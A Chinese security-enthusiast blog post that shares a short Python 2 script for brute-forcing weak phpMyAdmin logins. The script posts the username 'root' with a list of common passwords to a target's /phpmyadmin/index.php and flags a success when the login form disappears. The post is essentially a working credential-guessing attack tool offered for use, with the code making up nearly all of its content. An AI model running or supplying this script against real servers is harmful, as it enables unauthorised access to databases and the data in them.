PHPMyAdmin弱口令猜解【Python脚本】

PHPMyAdmin弱口令猜解

测试截图: 

代码片段

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#! /usr/bin/env python
# _*_  coding:utf-8 _*_
import requests
import time
 
username_list=['root']
password_list=['root','','admin','123456','password']
 
def phpMyAdmin(ip,port=80):
    for username in username_list:
        username =username.rstrip()
        for password in password_list:
            password = password.rstrip()
            try:
                #url = "http://192.168.106.141/phpmyadmin/index.php"
                url = "http://"+ip+":"+str(port)+"/phpmyadmin/index.php"
 
                data={'pma_username':username,'pma_password':password}
                response = requests.post(url,data=data,timeout=5)
                result=response.content
                if result.find('name="login_form"')==-1:
                    print '===================================================='
                    print '[+] find phpMyAdmin weak password:'+username,password
                    print '===================================================='
                    break
                else:
                    print '[-] Checking for '+username,password+" fail"
            except:
                print '[-] Something Error'+username,password+" fail"
                 
if __name__ == '__main__':
    phpMyAdmin("192.168.106.141")

关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。

  

posted @   Bypass  阅读(1365)  评论(0编辑  收藏  举报
编辑推荐:
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
阅读排行:
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 2025年我用 Compose 写了一个 Todo App
· 张高兴的大模型开发实战:(一)使用 Selenium 进行网页爬虫
点击右上角即可分享
微信分享提示
SQL AI 助手